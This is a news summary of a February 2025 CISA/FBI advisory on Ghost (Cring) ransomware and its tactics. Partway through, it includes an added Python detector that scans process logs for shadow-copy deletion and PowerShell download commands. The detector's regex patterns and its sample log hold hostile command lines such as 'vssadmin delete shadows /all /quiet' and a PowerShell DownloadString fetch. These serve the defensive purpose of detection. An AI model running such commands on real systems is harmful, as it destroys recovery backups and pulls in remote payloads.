CISA, FBI Warn of China-Based Ghost Ransomware Threatening Global Critical Infrastructure
February 21, 2025
Active since early 2021, Ghost ransomware primarily targets outdated publicly facing services and exploits known vulnerabilities in internet-facing servers.
Key tactics, techniques, and procedures (TTPs) identified include the use of PowerShell for executing commands, disabling Microsoft Defender to evade detection, and creating local accounts for persistence on compromised systems.
In response to the evolving threat, AttackIQ released an attack graph showcasing the TTPs of Ghost ransomware, aimed at helping organizations assess their security controls.
Recommendations for detection include monitoring command line activities related to the deletion of volume shadow copies and the use of PowerShell to download malicious payloads.
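To make the two detection recommendations above concrete, here is an added example (not code from the advisory, CISA, or AttackIQ) that scans Windows process-creation log lines for shadow-copy deletion commands and PowerShell download primitives. The pipe-delimited log format, the regex patterns, and the sample log lines are this example's own assumptions and constructions, not indicators published on the page.

```python
"""Toy detector for two Ghost-advisory TTPs over process-creation logs.

Assumptions (this example's own, not the advisory's): a pipe-delimited
log line format and the regex patterns below, which approximate the
well-known shadow-copy deletion commands and PowerShell download
primitives rather than any indicator listed in the advisory.
"""
import re
from dataclasses import dataclass

# Assumed log schema: timestamp|host|user|image path|full command line
LOG_FIELDS = ("timestamp", "host", "user", "image", "command_line")

# Inhibit-system-recovery: deletion of volume shadow copies.
SHADOW_COPY_DELETION = (
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I),
    re.compile(r"Win32_ShadowCopy\b.*\.Delete\(\)", re.I),
)

# PowerShell primitives commonly used to fetch a remote payload.
POWERSHELL_DOWNLOAD = (
    re.compile(r"\bInvoke-WebRequest\b|\biwr\b", re.I),
    re.compile(r"\bInvoke-RestMethod\b|\birm\b", re.I),
    re.compile(r"\.DownloadString\(|\.DownloadFile\(", re.I),
    re.compile(r"\bStart-BitsTransfer\b", re.I),
)


@dataclass
class Finding:
    technique: str
    host: str
    user: str
    command_line: str


def parse_line(line):
    """Split one log line into a dict; the command line may itself contain '|'."""
    parts = line.rstrip("\n").split("|", len(LOG_FIELDS) - 1)
    if len(parts) != len(LOG_FIELDS):
        raise ValueError(f"malformed log line: {line!r}")
    return dict(zip(LOG_FIELDS, parts))


def is_powershell(image):
    """True when the process image is a PowerShell host (Windows PowerShell or pwsh)."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in {"powershell.exe", "pwsh.exe"}


def classify(event):
    """Return the list of technique labels that match this event (empty if benign)."""
    cmd = event["command_line"]
    labels = []
    if any(p.search(cmd) for p in SHADOW_COPY_DELETION):
        labels.append("inhibit-recovery/shadow-copy-deletion")
    # Only count download primitives when they run inside a PowerShell host,
    # which keeps unrelated tools that mention the same names from alerting.
    if is_powershell(event["image"]) and any(p.search(cmd) for p in POWERSHELL_DOWNLOAD):
        labels.append("powershell-download")
    return labels


def scan(lines):
    """Scan an iterable of log lines and return one Finding per matched technique."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_line(line)
        for label in classify(event):
            findings.append(Finding(label, event["host"], event["user"], event["command_line"]))
    return findings


# Constructed sample log lines (not real telemetry): two true positives for
# shadow-copy deletion, one for a PowerShell download, and two benign lines.
SAMPLE_LOG = """\
2025-02-19T10:01:02Z|WS01|corp\\alice|C:\\Windows\\System32\\cmd.exe|cmd.exe /c vssadmin delete shadows /all /quiet
2025-02-19T10:01:05Z|WS01|corp\\alice|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -c "(New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
2025-02-19T10:02:00Z|WS02|corp\\bob|C:\\Windows\\System32\\wbem\\wmic.exe|wmic shadowcopy delete
2025-02-19T10:03:00Z|WS03|corp\\carol|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe Get-ChildItem C:\\Users
2025-02-19T10:04:00Z|WS04|corp\\dave|C:\\Windows\\System32\\cmd.exe|cmd.exe /c vssadmin list shadows
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.technique:40} {f.host:6} {f.user:12} {f.command_line}")
```

The benign `vssadmin list shadows` line and the plain `Get-ChildItem` PowerShell line are there deliberately: a rule keyed on the binary name alone would alert on both, so the patterns require the destructive verb or the download primitive, and the PowerShell check is additionally gated on the process image.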
Operated by a group based in China, Ghost ransomware has compromised organizations in over 70 countries, affecting critical infrastructure, healthcare, and educational institutions.
On February 19, 2025, CISA, the FBI, and MS-ISAC issued a Cybersecurity Advisory regarding Ghost ransomware, also known as Cring, outlining its tactics and indicators of compromise identified through FBI investigations.
The ransomware employs advanced encryption methods using AES-256 and RSA-4096 algorithms, while also inhibiting system recovery by deleting volume shadow copies.
Ghost operators utilize strategies such as rotating ransomware payloads and modifying ransom notes to evade detection and attribution.
CISA advises organizations to review the advisory's patching and detection recommendations to defend against these attacks, and to prioritize detection of the techniques Ghost ransomware uses.
AttackIQ emphasizes the importance of continuous testing and validation of security controls to enhance defenses against Ghost ransomware and similar threats.
Summary based on 1 source
Source: Security Boulevard, Feb 20, 2025: [CISA AA25-050A] #StopRansomware: Ghost (Cring) Ransomware